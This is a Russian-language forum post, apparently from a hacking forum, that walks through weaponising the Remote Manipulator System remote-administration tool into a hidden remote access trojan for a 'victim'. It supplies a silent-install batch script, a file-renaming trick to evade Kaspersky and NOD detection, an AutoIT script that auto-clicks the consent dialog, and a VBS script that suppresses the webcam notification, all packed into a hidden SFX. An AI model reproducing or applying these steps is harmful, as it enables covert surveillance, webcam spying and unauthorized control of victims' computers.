Последний штрих, инструкция как сделать свой билд из офф. сборки:
1)Качаем сборку
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
;
2)Далее Viewer->Инструменты->MSI-Конфигуратор:
3)Указываем путь к своему хосту (Он находится в архиве вместе с вьювером)
Ставим
One-Click пакет. Удобен для тихой и простой установки. Удаленный пользователь просто запускает данный файл, далее программа сама, без дополнительных вопросов, установится на удаленном компьютере.
Конфигурируем куда присылать ID, ну понятно, делаем так что-бы он не отображался в меню и т.д.
4)Получим пакет MSI, это и есть наш билд...
5) Перед тем как его посылать к жертве делаем следующее:
5.1)На самом деле наша сборка состоит из двух файлов, которые можно распаковать винраром:
Install.cmd содержит примерно следующий код:
@chcp 1251
@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /passive REBOOT=ReallySuppress
@MsiExec /x {0D3BB12F-9903-4D4A-A062-97947D2AB44E} /passive REBOOT=ReallySuppress
@ping 127.0.0.1
@MsiExec /I "rms.host5.6ru.msi" /qn
Этот код может детектиться некоторыми АВ, поэтому:
Чтоб "криптануть" батник достаточно изменить имя самого msi-файла - т.е изменить в батнике его имя "rms.host5.6ru.msi" на "rOs.host5.6ru.msi" и детект каспера и нода на файл слетит.
Как всё это сделали, нужно заново сконфигурировать инсталлер...
Либо сделать проще поменять имя хоста (rms.host5.6ru.msi) скаченного с офф. сайта и в пункте 3 сконфигурировать...
5.2)Вот мы сделали офф. сборку, т.е. получили exe файл с которым и будем работать, дальше нам нужно автоматически нажать на кнопку "Да", когда РМС устанавливается у жертвы, для этого нужна дополнительная "Штучка", вот навоял на AutoIT:
$Var1 = WinWait("Remote Manipulator System - Вопрос")
While 1
Sleep (100)
If $Var1 <> 0 Then
ControlClick($Var1, "", "[CLASS:Button;INSTANCE:1]")
ExitLoop
EndIf
WEnd
Можете подкорректировать, но работает (
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
) ,файлы во вложении (Пароль 111) там-же реализовал обход веба, но начинают палить другие...
5.3)Для отключения оповещения камеры, юзаем этот скрипт:
Set shell = WScript.CreateObject("WScript.Shell")
timeout = 5
title = "RMS_WND_HID"
Do
If shell.AppActivate(title) Then
Shell.SendKeys "%{F4}"
End If
WScript.Sleep 300
timeout = timeout - 1
Loop
6)Итого у нас три файла:MSI, скрипт AutoIT, скрипт VB:
Далее запаковываем всё это в SFX и выполняем в следующем порядке:
1.Скрипт АутоИТ;
2.Скрипт VBS;
3.Наш инсталлер
Ну и скрытый режим не забыть:
УРААА, вроде всё !